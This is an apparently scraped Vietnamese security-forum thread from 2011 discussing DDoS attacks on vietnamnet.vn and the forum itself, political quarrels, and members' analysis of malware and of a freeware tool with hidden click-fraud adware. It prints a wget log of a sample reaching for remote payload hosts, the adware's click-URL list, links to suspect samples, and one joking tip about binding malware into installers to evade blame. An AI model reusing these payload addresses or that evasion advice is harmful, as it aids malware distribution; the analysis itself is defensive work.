@all: vietnamnet.vn đã bị hack hay chỉ là 1 giao thức an toàn ... Post: 9:30 AM 17/Sep/2011.  
@TMDTHBC : anh hỏi " vietnamnet.vn đã bị hack hay chỉ là một giao thức an toàn ... " = em thật sự không hiểu anh hỏi gì ạ? xin anh lý giải câu hỏi cho em được học hỏi được không ạ? hay là kiểu " xìtrum ? " :-O >> thông tim thêm : bây giờ là 10h27 phút giờ hà nội em đang bên viên chăn dùng ISP của thailand nhưng vẫn không thể vào được www.vietnamnet.vn <<< lỗi bì bị ddos . The server at www.vietnamnet.vn is taking too long to respond.  
mình đang truy cập bằng cable SCTV, lúc tối còn "chạy" rất tốt, nhưng sáng ra truy cập lại thì chỉ hiện logo vietnamnet và thông báo: " Mời độc giả nhấn vào đây để tiếp tục". Nhưng nhấn vào thì "vẫn như cũ, không có tín hiệu gì hết ..."]]>
/hvaonline/posts/list/39641.html#247282 /hvaonline/posts/list/39641.html#247282 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247295 /hvaonline/posts/list/39641.html#247295 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247297 /hvaonline/posts/list/39641.html#247297 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi wrote:

TMDTHBC wrote:
>> thông tim thêm : bây giờ là 10h27 phút giờ hà nội em đang bên viên chăn dùng ISP của thailand nhưng vẫn không thể vào được www.vietnamnet.vn <<<  
Bác này đi từ Lao qua Thailand mất chưa tới 1 phút ấy nhỉ?]]> /hvaonline/posts/list/39641.html#247298 /hvaonline/posts/list/39641.html#247298 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247299 /hvaonline/posts/list/39641.html#247299 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247301 /hvaonline/posts/list/39641.html#247301 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247303 /hvaonline/posts/list/39641.html#247303 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc wrote:
Đừng bàn chính trị với tư tưởng ở đây nữa. CHẤM DỨT NGAY HÀNH VI CHÍNH TRỊ HOÁ CÔNG NGHỆ THÔNG TIN ĐI điều đó thật dơ bẩn và bỉ ổi, nhất là đối với những ai đang theo con đường công nghệ thông tin thì nên đi đúng con đường công nghệ thông tin thuần tuý, đừng biến nó thành công cụ phục vụ cho lợi ích của một cá nhân, tổ chức hay một nhóm tư tưởng gì đó, đừng làm cho 4 từ CÔNG NGHỆ THÔNG TIN trở nên u ám và đen tối bởi lợi ích của một tổ chức hay một nhóm người @TQN: I am waiting you 

angel-pc wrote:
@cino lời cuối, chỉ 2 ý thôi: 1. Sử dụng cntt phục vụ cho chính trị và chính trị hoá cntt là 2 cái khác nhau 2. MÌNH CẢM THẤY DƯỜNG NHƯ một số admin của HVA cụ thể là bác comale có ý muốn lợi dụng mức độ ảnh hưởng của diễn đàn để chầm chậm đưa những tư tưởng chính trị, quan điểm của bác vào đầu óc của các mem trong diễn đàn, như vậy là không fair play với các mem trong diễn đàn vốn là những người đam mê cntt, và nó giống như một chiến thuật chính trị hoá cntt ở đây, đọc nhiều bài viết của bác ấy mình như bội thực với những quan điểm của bác ấy, trong bất cứ tình huống nào có thể bác ấy đều đưa luận điểm mang tính chính trị vào. @comale: bàn về chính trị(chưa nói đến nội dung là gì) là quyền của mỗi cá nhân, mình không có ý kiến, nhưng bàn như thế nào, trong tình huống nào để nó được tế nhị và phù hợp tiêu chí và tính chất của diễn đàn mới là vấn đề Nếu mình hiểu sai ý bạn coi như mình chưa nói nhé cino 
Chính trị là 1 góc nhìn, ta không việc gì phải né tránh hay theo 1 cái lề tự tạo nào cả, những cái lề trong cuộc sống đã nhiều lắm rồi, các bạn đừng cố tạo thêm những cái lề trên thế giới mạng và yêu cầu những người có khả năng tư duy độc lập theo cái lề của các bạn, chán lắm. Những ai kéo chính trị vào mà bàn nhảm thì sẽ bộc lộ bản thân và ý đồ của họ, mọi người sẽ dần phớt lờ ý kiến hay phát biểu của các thành viên đó. Còn những bạn nào khuyên bảo người khác không đụng chạm gì đến chính trị khi bàn về các vấn đề trong CNTT thì có lẽ đã lạc hậu phần nào với thế giới rồi, nên tìm hiểu thêm về sâu Stuxnet và bình luận của giới nghiên cứu bảo mật và báo chí!]]>
/hvaonline/posts/list/39641.html#247305 /hvaonline/posts/list/39641.html#247305 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247315 /hvaonline/posts/list/39641.html#247315 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc wrote:
@cino lời cuối, chỉ 2 ý thôi: 1. Sử dụng cntt phục vụ cho chính trị và chính trị hoá cntt là 2 cái khác nhau 2. MÌNH CẢM THẤY DƯỜNG NHƯ một số admin của HVA cụ thể là bác comale có ý muốn lợi dụng mức độ ảnh hưởng của diễn đàn để chầm chậm đưa những tư tưởng chính trị, quan điểm của bác vào đầu óc của các mem trong diễn đàn, như vậy là không fair play với các mem trong diễn đàn vốn là những người đam mê cntt, và nó giống như một chiến thuật chính trị hoá cntt ở đây, đọc nhiều bài viết của bác ấy mình như bội thực với những quan điểm của bác ấy, trong bất cứ tình huống nào có thể bác ấy đều đưa luận điểm mang tính chính trị vào. @comale: bàn về chính trị(chưa nói đến nội dung là gì) là quyền của mỗi cá nhân, mình không có ý kiến, nhưng bàn như thế nào, trong tình huống nào để nó được tế nhị và phù hợp tiêu chí và tính chất của diễn đàn mới là vấn đề Nếu mình hiểu sai ý bạn coi như mình chưa nói nhé cino 
Bạn angel-pc trực tiếp lôi tên của tớ ra cho nên tớ cũng nên trả lời cho rốt ráo. Thứ nhất, cái "mình cảm thấy dường như" của bồ chỉ là cảm giác cá nhân mà nếu là cảm giác không có phân tích và chứng minh thì thường chẳng có mấy giá trị. Thứ nhì, diễn đàn này không phải tự nhiên mà có "mức độ ảnh hưởng" và "mức độ ảnh hưởng" của diễn đàn không chỉ mấy thứ kỹ thuật khô khan nhàm chán. Diễn đàn này từ lâu không phải là diễn đàn "hỏi" và "đáp" mà là diễn đàn đào sâu khả năng tư duy, lập luận và nhận định vấn đề. Từ hồi tớ tham gia diễn đàn này đến bây giờ, tớ hiếm khi trả lời kiểu "mì ăn liền" mà luôn luôn tìm cách khơi mở khả năng tư duy. Thành viên đến với diễn đàn này không chỉ là vì mớ kiến thức IT mà còn là những vấn đề xoay quanh IT. Bởi vậy, đừng có dùng cái mớ "đam mê CNTT" để là tiền đề và áp đặt nó vô chỗ "thuần tuý CNTT". Những gì cá nhân tớ mang lại và chia sẻ với diễn đàn này đều là những cái cần để suy ngẫm và bồi đắp và để làm một con người thật sự chớ không phải là những cỗ máy vô tri. Tớ đã nói rất nhiều lần: nếu con người chỉ "thuần tuý kỹ thuật" thì không còn là con người mà chỉ là những cỗ máy làm chuyện kỹ thuật. Con người còn có nhiều thứ khác hơn là mớ kỹ thuật khô khan và nhàm chán. Thứ ba, khi nói đến chuyện "fair play", bồ có thấy fair khi một diễn đàn kỹ thuật hoàn toàn tự nguyện và vô vụ lợi phải è lưng ra chống đỡ và gánh chịu những tổn thất vật chất, tinh thần, danh dự từ những kẻ đã sử dụng kỹ thuật để làm những trò chính trị hay không? Nếu bồ cho rằng họ có thể phát tán virus, tạo botnets, thâm nhập thông tin cá nhân để chơi những trò bêu rếu thất thiệt là "fair play" thì việc phân tích kỹ thuật những trò hư hoại ấy ở diễn đàn này (kèm theo những bình luận về phương diện lương tâm nghiệp vụ, về đạo đức con người") không "fair play" thì tiêu chuẩn "fair play" của bồ là loại tiêu chuẩn gì vậy? Thứ tư, tớ dám cá là bồ đọc chưa đến 1/100 những bài tớ viết hoặc bồ chỉ đọc một cách hời hợt với con mắt đầy định kiến để rồi có những "cảm giảc" như trên. Chính bồ là người luôn luôn bị bóng ma chính trị ám ảnh cho nên cái gì bồ cũng có thể dễ dàng quy chụp ở góc độ chính trị. Với tớ, cái gì hư hoại, dơ bẩn, vô đạo đức, kể cả đạo đức chức nghiệp và đạo đức làm con người, tớ đều có thể phê phán. Nói cho cùng, những cá nhân tham gia diễn đàn này là những cỗ máy kỹ thuật hay là những con người có cảm giác, có lương tri đây? Thứ năm, bồ có quyền không đăng nhập diễn đàn này, thậm chí không đọc những bài trên diễn đàn này của tớ. Chẳng ai ép buộc bồ phải đọc với mớ định kiến hẹp hòi và phiến diện của bồ để rồi cảm thấy bội thực cả. Chính bồ tự nguyện đọc rồi bồ tự nguyên than phiền là sao? Thứ sáu, tớ đã bảo, bản thân chính trị chẳng có tội lỗi gì hết. Chỉ có những cái đầu đầy định kiến và hạn hẹp mới nhìn đến chính trị như một thứ cấm kỵ một cách ấu trĩ. Trong khi bồ đang phát biểu như trên, chính bản thân bồ đã chìm đắm trong chính trị mà bồ cũng chẳng nhận thấy. Bồ hãy tự hỏi xem, ai đang có những hành vi "chính trị hoá công nghệ thông tin" vậy? Hãy tỉnh táo và trung thực khi suy nghĩ về việc này. Nếu bồ không đủ khả năng, xin đừng vào diễn đàn này nữa vì diễn đàn này không phù hợp với bồ. Hãy tìm một diễn đàn nào đó "thuần tuý CNTT" mà sinh hoạt và hãy cúi đầu như những cỗ máy không có tư duy, không khả năng nhận định, không cần phân tích.]]>
/hvaonline/posts/list/39641.html#247316 /hvaonline/posts/list/39641.html#247316 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247324 /hvaonline/posts/list/39641.html#247324 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247327 /hvaonline/posts/list/39641.html#247327 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
--2011-09-18 19:52:37--  http://wide.ircop.cn/index.txt?113
Resolving wide.ircop.cn... 200.74.244.197
Connecting to wide.ircop.cn|200.74.244.197|:80... failed: Connection refused.
--2011-09-18 19:52:38--  http://pref.firebay.cn/index.txt?113
Resolving pref.firebay.cn... 200.74.244.197
Connecting to pref.firebay.cn|200.74.244.197|:80... failed: Connection refused.
--2011-09-18 19:52:39--  http://daily.leteaks.com/index.txt?113
Resolving daily.leteaks.com... 200.74.244.197
Connecting to daily.leteaks.com|200.74.244.197|:80... failed: Connection refused.
--2011-09-18 19:52:40--  http://link.susaks.com/index.txt?113
Resolving link.susaks.com... 200.74.244.198
Connecting to link.susaks.com|200.74.244.198|:80... failed: Connection refused.
--2011-09-18 19:52:41--  http://option.drfound.net/k113.css
Resolving option.drfound.net... 204.12.220.181, 94.242.203.16
Connecting to option.drfound.net|204.12.220.181|:80... failed: Connection timed out.
Connecting to option.drfound.net|94.242.203.16|:80... failed: Connection timed out.
Retrying.

--2011-09-18 19:53:23--  (try: 2)  http://option.drfound.net/k113.css
Connecting to option.drfound.net|204.12.220.181|:80... failed: Connection timed out.
Connecting to option.drfound.net|94.242.203.16|:80... failed: Connection timed out.
Retrying.

--2011-09-18 19:54:05--  (try: 3)  http://option.drfound.net/k113.css
Connecting to option.drfound.net|204.12.220.181|:80... failed: Connection timed out.
Connecting to option.drfound.net|94.242.203.16|:80... failed: Connection timed out.
Giving up.
Vào http://pref.firebay.cn http://pref.firebay.cn thì lại thấy là website của công ty Hanover Company Store, LLC, hình như bán vải, gối, mền. Quái, mấy anh stl chuyển nghề qua buôn bán à :-) ]]>
/hvaonline/posts/list/39641.html#247331 /hvaonline/posts/list/39641.html#247331 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247333 /hvaonline/posts/list/39641.html#247333 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Vào http://pref.firebay.cn http://pref.firebay.cn thì lại thấy là website của công ty Hanover Company Store, LLC, hình như bán vải, gối, mền. Quái, mấy anh stl chuyển nghề qua buôn bán à  
Chắc nhờ bán chăn ga gối đệm STL mới có kinh phí duy trì hoặc có thể là lấy credit card của khách hàng duy trì hoạt động. Em thấy chẳng 1 công ty kinh doanh đàng hoàng nào mà Domain lại để Status: clientTransferProhibited cả ]]>
/hvaonline/posts/list/39641.html#247342 /hvaonline/posts/list/39641.html#247342 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247348 /hvaonline/posts/list/39641.html#247348 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Riêng vietnamnet thì tớ không thể vào trang web này gần cả tháng nay rồi. Ngay cả tớ tunnel qua một IP ở VN cũng không vào vietnamnet được. Các IP nước ngoài như Nhật, Úc, Đức, Mỹ ...v....v... đều không vào vietnamnet được. Có tạo cookie (như ai đó có đề cập) cũng vô phương. Theo vài nguồn (chưa kiểm chứng) thì vietnamnet đã tường trình sự vụ đến CA và nhờ được giúp đỡ :P . Hãy chờ xem kết quả ra sao. 
Tôi thì vẫn vào bình thường nhưng cũng có đôi lúc bị time out. Chứng tỏ kỹ thuật bên Vietnamnet đã thiết lập gì đó mà anh không vào được. Cách đây 2 hôm, xem TV, có thấy thông báo về việc Vietnamnet bị DDOS, chắc bên Vietnamnet cũng không chịu được vì bị thất thu các nguồn quảng cáo (thông tin này xem trên TV) nên phải nhờ bên CA thôi. LVD ]]>
/hvaonline/posts/list/39641.html#247349 /hvaonline/posts/list/39641.html#247349 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://a74b24df.linkbucks.com
 http://a74b24df.linkbucks.com
 http://a74b24df.linkbucks.com
 http://2050aad9.linkbucks.com
 http://d27332b6.linkbucks.com
 http://052162c8.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://7d67a321.linkbucks.com
 http://3060e20c.linkbucks.com
 http://ac9ee037.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://4d6e46fd.linkbucks.com
 http://4a6045bc.linkbucks.com
 http://f00ee973.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://b9e8ccfb.linkbucks.com
 http://0779dfd9.linkbucks.com
 http://82883b02.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://a14a1ab3.linkbucks.com
 http://6590b68a.linkbucks.com
 http://c603c304.linkbucks.com
 http://d332db80.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://5fffee9b.linkbucks.com
 http://bfbf5fab.linkbucks.com
 http://438e215b.linkbucks.com
 http://1ec41b10.linkbucks.com
 http://49abc570.linkbucks.com
 http://49abc570.linkbucks.com
 http://49abc570.linkbucks.com
 http://54a960f9.linkbucks.com
 http://d3125c51.linkbucks.com
 http://aa3cee9a.linkbucks.com
 http://40df7943.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://6fcc3f8e.linkbucks.com
 http://141e8889.linkbucks.com
 http://8464fce6.linkbucks.com
Download phần mềm này tại: http://www.toitietkiem.vn/sites/default/files/ToiTietKiem.Vn%20Professional%20Setup.rar Chỉ biết bó 3 chân.com. Càng lúc càng loạn ! Không biết FPT và Toyota có biết là phần mềm và nhóm sv này đã làm điều bậy bạ này không, có đáng để họ khen thưởng, tung hô không ? PS: Không không chắc sẽ có nhiều người ghét mình, coi mình là kẽ "chọc gậy bánh xe" quá :-( ]]>
/hvaonline/posts/list/39641.html#247352 /hvaonline/posts/list/39641.html#247352 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Theo vài nguồn (chưa kiểm chứng) thì vietnamnet đã tường trình sự vụ đến CA và nhờ được giúp đỡ :P . Hãy chờ xem kết quả ra sao. 
Vụ việc VietnamNet đã được đưa lên chương trình thời sự của VTV1 rồi http://media.vtv.vn/Media/Get/Thoi-su-19h---17092011-4ab5977e2f.html Bắt đầu từ phút thứ 24. Hy vọng sau đây các cơ quan chức năng sẽ có các động thái tích cực hơn.]]>
/hvaonline/posts/list/39641.html#247353 /hvaonline/posts/list/39641.html#247353 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247354 /hvaonline/posts/list/39641.html#247354 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Sự gian dối, lừa đão, bằng mọi cách đạp đầu người khác để đi lên càng ngày càng phổ biến và lộ rõ. Sáng nay, duyệt facebook, thấy cái link phần mềm ToiTietKiem.Vn_Professional bị nghi ngờ có trojan, tui down về phân tích thử. Quả đúng không sai: một phần mềm rất tệ, trái ngược hẳn với quảng cáo rầm rộ, của nhóm sv của FPT, đã đoạt giải gì đó, lại cài cắm click adware trong đó. Đây chỉ là một đoạn link click của linkbucks.com mà ct này nhúng vào, dùng Form3 với 4 component WebBrowser để tự động gọi method Click. Form3 được tác giả hide đi nên chúng ta sẽ không thấy trên màn hình: Code:
http://a74b24df.linkbucks.com
 http://a74b24df.linkbucks.com
 http://a74b24df.linkbucks.com
 http://2050aad9.linkbucks.com
 http://d27332b6.linkbucks.com
 http://052162c8.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://7d67a321.linkbucks.com
 http://3060e20c.linkbucks.com
 http://ac9ee037.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://4d6e46fd.linkbucks.com
 http://4a6045bc.linkbucks.com
 http://f00ee973.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://b9e8ccfb.linkbucks.com
 http://0779dfd9.linkbucks.com
 http://82883b02.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://a14a1ab3.linkbucks.com
 http://6590b68a.linkbucks.com
 http://c603c304.linkbucks.com
 http://d332db80.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://5fffee9b.linkbucks.com
 http://bfbf5fab.linkbucks.com
 http://438e215b.linkbucks.com
 http://1ec41b10.linkbucks.com
 http://49abc570.linkbucks.com
 http://49abc570.linkbucks.com
 http://49abc570.linkbucks.com
 http://54a960f9.linkbucks.com
 http://d3125c51.linkbucks.com
 http://aa3cee9a.linkbucks.com
 http://40df7943.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://6fcc3f8e.linkbucks.com
 http://141e8889.linkbucks.com
 http://8464fce6.linkbucks.com
Download phần mềm này tại: http://www.toitietkiem.vn/sites/default/files/ToiTietKiem.Vn%20Professional%20Setup.rar Chỉ biết bó 3 chân.com. Càng lúc càng loạn ! Không biết FPT và Toyota có biết là phần mềm và nhóm sv này đã làm điều bậy bạ này không, có đáng để họ khen thưởng, tung hô không ? PS: Không không chắc sẽ có nhiều người ghét mình, coi mình là kẽ "chọc gậy bánh xe" quá :-(  
Không những phần mềm có trojan click quảng cáo mà ngay cả website phân phối phần mềm của nhóm sinh viên này cũng tạo những popup quảng cáo để kiếm tiền dù người dùng không click vào bất cứ quảng cáo nào cả :( . Sự vụ này được bolzano_1989 lần đầu phát hiện khi điều tra nguyên nhân dẫn đến việc xuất hiện hàng loạt các cửa sổ quảng cáo của các trang web Tàu ( lại là Tàu :( ) được mở bởi Internet Explorer ở máy tính một người bạn mỗi khi khởi động máy tính, hiện giờ những hành vi bẩn của nhóm sinh viên và phần mềm này đã biến thái và trở nên tinh vi hơn như anh TQN đã nêu ở trên. Link ở diễn đàn CMCLab Support: http://support.cmclab.net/vn/ung-dung-tien-ich/toitietkiem-vn-professional-tiet-kiem-dien-toi-uu-cho-may-tinh/]]>
/hvaonline/posts/list/39641.html#247355 /hvaonline/posts/list/39641.html#247355 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.toitietkiem.vn/sites/default/files/ToiTietKiem.Vn%20Professional%20Setup.rar
To bolzano_1989 Em resize lai cái image này đi để nó khỏi phá vỡ khung hình của forum, dù đã zoom out hết cỡ. Hiên tại Dimensions của nó là 1,366px × 768px., nên resize nó xuống còn khoảng 800 pixels x ....pixels là được. PXMMRF ]]>
/hvaonline/posts/list/39641.html#247370 /hvaonline/posts/list/39641.html#247370 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Chỉ biết bó 3 chân.com. Càng lúc càng loạn ! Không biết FPT và Toyota có biết là phần mềm và nhóm sv này đã làm điều bậy bạ này không, có đáng để họ khen thưởng, tung hô không ? PS: Không không chắc sẽ có nhiều người ghét mình, coi mình là kẽ "chọc gậy bánh xe" quá :-(  
Việc Đại Học FPT khen thường và tung hô nhóm sinh viên này cũng gần giống 1 hình thức để PR cho trường ĐH FPT. vì mục đích chính của việc lập ĐH-FPT là để kinh doanh. Hiện nay trường cũng không chú trọng vào việc đào tạo - giáo dục mấy nữa. mọi quảng cáo trên Báo, website của trường kể cả những lời nói của Hiệu Phó Nguyễn Xuân XXX trên báo cóc (1 tờ báo phát hành nội bộ trường) cũng chỉ là chém gió. Hoàn toàn không có thật, việc này nếu bạn nào học ở FPT cũng biết được 1 số phần. Chỉ trong chăn mới biết chăn có rận]]>
/hvaonline/posts/list/39641.html#247375 /hvaonline/posts/list/39641.html#247375 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247377 /hvaonline/posts/list/39641.html#247377 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?c3mjeeu4d9b9czv hình:
đây là file AutoRuns http://www.mediafire.com/?57k76tbhmu8ifj7]]>
/hvaonline/posts/list/39641.html#247383 /hvaonline/posts/list/39641.html#247383 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247387 /hvaonline/posts/list/39641.html#247387 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
songvedemdl, bạn vào HVAOnline thì thấy kết nối đến tienve.org là đúng rồi ;) . Bạn scan và gửi log sau cho mình nhé: Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/  
mình có up AutoRuns.arn ở trên rồi, nhưng giờ mình up autorunsc theo yêu cầu của bạn ở link sau http://www.mediafire.com/?hmrjyz3jz9gf791 dùng ghostExp để kiểm tra bản ghost và lôi đầu thằng PowerDrv.exe (thằng này để tự động cài driver và sẽ tự động bị xoá khi quá trình ghost tự nhận driver xong) ra thì Avira báo là virust nên up lên nhờ mấy anh coi thử link của nó đây http://www.mediafire.com/?gwq4q8wela8qa2x]]>
/hvaonline/posts/list/39641.html#247391 /hvaonline/posts/list/39641.html#247391 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247393 /hvaonline/posts/list/39641.html#247393 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
mainguyendl có thể gửi 2 file sau lên để mọi người kiểm tra thêm: c:\program files\unikey v408\unikey.exe c:\program files\internet download manager\idman.exe  
bạn đang nói mình ha? hay mainguyendl? nếu nói mình thì tối đi làm về mình se up lên mediafire cho bạn, thank bạn nhiều!!]]>
/hvaonline/posts/list/39641.html#247400 /hvaonline/posts/list/39641.html#247400 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247401 /hvaonline/posts/list/39641.html#247401 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247409 /hvaonline/posts/list/39641.html#247409 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247411 /hvaonline/posts/list/39641.html#247411 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Em đi nhậu mà cũng không biết tin thằng bạn nhậu nào cả ! Cứ nghĩ trong đầu, mẹ, không biết nó có phải là thành viên stl không ? =))  
Chi mà khổ vậy anh. Có lẽ điều này còn nguy hiểm và tác hại hơn cả mấy con malware stl :-S ]]>
/hvaonline/posts/list/39641.html#247432 /hvaonline/posts/list/39641.html#247432 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

vikjava wrote:

TQN wrote:
Em đi nhậu mà cũng không biết tin thằng bạn nhậu nào cả ! Cứ nghĩ trong đầu, mẹ, không biết nó có phải là thành viên stl không ? =))  
Chi mà khổ vậy anh. Có lẽ điều này còn nguy hiểm và tác hại hơn cả mấy con malware stl :-S  
Cái này thì anh đã có ý kiến từ hồi tháng 7: /hvaonline/posts/list/120/39504.html

conmale wrote:
Trong trò chơi "chân chân giả giả" này cái thiệt hại ghê gớm nhất không phải là bị cài trojans, bị mất hòm thư hoặc bị bêu rếu một cách thô thiển mà là sự ngờ vực lẫn nhau. Những trò chơi của STL đẩy người ta tới chỗ chẳng có ai còn có thể tin ai được nữa vì tất cả đều có thể là giả dối, nguỵ tạo và lường gạt. 
]]>
/hvaonline/posts/list/39641.html#247438 /hvaonline/posts/list/39641.html#247438 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Em đi nhậu mà cũng không biết tin thằng bạn nhậu nào cả ! Cứ nghĩ trong đầu, mẹ, không biết nó có phải là thành viên stl không ?  Anh TQN nói thế xem chừng bị tẩu hoả bởi cái gọi là STL rồi. Mình nghĩ người thông minh thì dễ chứ sống tử tế nó mới khó ;). Phải không anh TQN ]]> /hvaonline/posts/list/39641.html#247456 /hvaonline/posts/list/39641.html#247456 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Mình chỉ nhắc mấy anh em sv FPT đó là được rồi, bolzano. Mấy em sv FPT đó chịu khó remove cái Form3 ra giùm đi. Kiếm tiền thì nên quang minh chánh đại chứ, đừng làm những hành động vậy. Đã có ý tưởng tốt, viết phần mềm free thì free cho trót ! Em nhớ hồi xưa ông thầy dạy Anh Văn hồi PT của em có chế một câu: "Nhân bất học bất chi lý, trẻ không học lớn lên chích ma tuý, mình có học lớn lên làm đại uý" ;) Đùa một chút cho mọi anh em bớt căng thẳng.  
Thấy cu "thắng" học FPT tranh luận bên 4rum của cmc là do website bị "hacker" hack vào nên chèn trojan vào bản cài mà anh. Nhưng hình như là mấy cái Form3 này như anh nói là do chương trình của cu cậu bật lên để auto click. chứ không phải là do file exe nào của thằng "hacker" vì chắc chả thằng nào hâm lại đi resource cái toitietkiem.vn ra để lấy source rồi lại code lại thêm mấy cái Form3 -> build lại -> lại up lên server của toitietkiem.vn. Thường thì sẽ Binder cái malware vào :D. kinh nghiệm code phần mềm chứa mã độc là nên Binder mã độc vào chứ đừng code chèn vào phần mềm =)) để lúc bị phát hiện còn dễ cãi =)). tốt nhất là link download phần mềm từ trang chủ nên die =)) để cho người ta download phần mềm từ các diễn đàn khác ;)) mấy em nó mới vào đời, chưa có kinh nghiệm mấy vụ này. zzz Em nói sai chỗ nào mong anh em chỉ bảo hộ :D ]]>
/hvaonline/posts/list/39641.html#247470 /hvaonline/posts/list/39641.html#247470 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. nếu STL vẫn còn đang có thể tấn công DDOS Vietnamnet, vậy câu hỏi đặt ra là: "Tại sao STL không cho tấn công DDOS HVA nữa?" Theo thiển ý của tôi câu trả lời có thể là: 1. Mấy cái Botnet đó cũ, mà chúng ta chưa tìm ra. 2. STL không muốn tấn công HVA nữa, để HVA không dò tìm và phân tích mấy con botnet của STL. 3. Có thể có hai hệ thống tấn công khác nhau (STL + nhóm nào đó chẳng hạn). 4. ... LVD]]> /hvaonline/posts/list/39641.html#247490 /hvaonline/posts/list/39641.html#247490 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

levanduyet wrote:
Chào mọi người, Có vấn đề tôi không hiểu được là, nếu STL vẫn còn đang có thể tấn công DDOS Vietnamnet, vậy câu hỏi đặt ra là: "Tại sao STL không cho tấn công DDOS HVA nữa?" Theo thiển ý của tôi câu trả lời có thể là: 1. Mấy cái Botnet đó cũ, mà chúng ta chưa tìm ra. 2. STL không muốn tấn công HVA nữa, để HVA không dò tìm và phân tích mấy con botnet của STL. 3. Có thể có hai hệ thống tấn công khác nhau (STL + nhóm nào đó chẳng hạn). 4. ... LVD 
Không phải đâu bạn. STL không tấn công HVA nữa là vì mỗi lần tấn công HVA thì sẽ có người gởi mẫu mã để RE và mấy cái bot masters bị phá hết. Hơn nữa, tấn công vô HVA mà không thấy HVA chết thì.... phí đạn. Tấn công chỗ khác có kết quả thì hoan hỉ hơn. Không có nhóm nào khác hết. STL là STL. Từ code cho đến cách dàn dựng, lây lan hoàn toàn đặc sệch STL.]]>
/hvaonline/posts/list/39641.html#247493 /hvaonline/posts/list/39641.html#247493 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247581 /hvaonline/posts/list/39641.html#247581 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:
Hôm nay có báo Văn Hoá đưa tin VNN bị tấn công. http://www.baovanhoa.vn/khoahoccongnghe/39233.vho Với tình trạng này thì bất cứ tờ website nào của Việt Nam, từ các trang báo mạng lớn lẫn các site nhỏ như blogs... cũng sẽ trở thành CON TIN của bọn STL này. Theo bài báo này thì các IP tấn công hầu hết xuất phát từ Việt Nam, sao không nhờ vả đến HVA RE team nhỉ, phân tích mẫu rồi gửi cho các trình AV thì bọn STL này hết đất sống. Theo ý kiến cá nhân thì chắc mấy anh TQN, Conmale ... chắc sẽ giúp đỡ VNN hết mình. 
Anh thì lúc nào sẵn sàng nhưng anh không nghĩ vietnamnet hay baovanhoa sẽ nhờ anh em HVA giúp, ít ra là chính thức nhờ bởi vì có quá nhiều thứ "nhạy cảm".]]>
/hvaonline/posts/list/39641.html#247582 /hvaonline/posts/list/39641.html#247582 GMT
